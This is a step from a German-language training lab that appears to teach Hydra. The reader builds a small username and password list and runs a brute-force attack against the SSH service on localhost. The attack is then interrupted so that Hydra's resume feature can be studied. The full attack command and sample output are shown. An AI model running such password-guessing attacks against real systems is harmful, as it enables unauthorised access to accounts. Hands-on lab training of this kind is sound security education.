Simulation eines unterbrochenen Angriffs
In diesem Schritt werden wir einen unterbrochenen Hydra-Angriff simulieren. Dies hilft uns zu verstehen, wie Hydra Unterbrechungen behandelt und wie wir Angriffe später fortsetzen können. Wir starten zunächst einen einfachen Hydra-Angriff und unterbrechen ihn dann manuell.
Zunächst erstellen wir eine einfache Passwortliste. Öffnen Sie ein Terminal im Verzeichnis ~/project
und verwenden Sie nano
, um eine Datei namens passwords.txt
zu erstellen:
nano passwords.txt
Fügen Sie der Datei einige häufige Passwörter hinzu, jeweils ein Passwort pro Zeile. Beispielsweise:
password
123456
qwerty
Speichern Sie die Datei und verlassen Sie nano
(Ctrl+X, dann Y, dann Enter).
Jetzt erstellen wir eine einfache Datei mit Benutzernamen. Verwenden Sie nano
, um eine Datei namens users.txt
zu erstellen:
nano users.txt
Fügen Sie der Datei einen einzelnen Benutzernamen hinzu:
root
Speichern Sie die Datei und verlassen Sie nano
.
Als Nächstes starten wir einen Hydra-Angriff auf den SSH-Service auf localhost
. Wir verwenden einen einfachen Befehl, der wahrscheinlich schnell erfolgreich ist, aber wir unterbrechen ihn manuell, um einen längeren Angriff zu simulieren.
Führen Sie den folgenden Befehl aus:
hydra -L users.txt -P passwords.txt localhost ssh
Dieser Befehl teilt Hydra mit:
-L users.txt
: Verwenden Sie die Datei users.txt
für Benutzernamen.
-P passwords.txt
: Verwenden Sie die Datei passwords.txt
für Passwörter.
localhost
: Zielen Sie auf localhost
ab.
ssh
: Greifen Sie den SSH-Service an.
Während der Angriff läuft (Sie sollten sehen, dass Hydra verschiedene Benutzername/Passwort-Kombinationen testet), drücken Sie Ctrl+C
, um ihn zu unterbrechen.
Sie sollten eine Ausgabe ähnlich der folgenden sehen (die genaue Ausgabe kann variieren):
Hydra v9.6 starting, press Enter to test creds or Ctrl+C to exit
[DATA] 1 task, 1 server, 1 userfile, 1 passfile, max 1 task(s) per 1 server, overall 1 task(s)
[DATA] attacking ssh://localhost:22/
[ATTEMPT] target: localhost login: root password: password
[ATTEMPT] target: localhost login: root password: 123456
[ATTEMPT] target: localhost login: root password: qwerty
^C
3 of 3 target(s) completed, 0 valid password(s) found
Das ^C
zeigt an, dass Sie den Prozess unterbrochen haben. Dies simuliert ein Szenario, in dem der Angriff vorzeitig gestoppt wurde. Wir werden diesen unterbrochenen Zustand in den nächsten Schritten nutzen, um die Fortsetzungsfähigkeiten von Hydra zu untersuchen.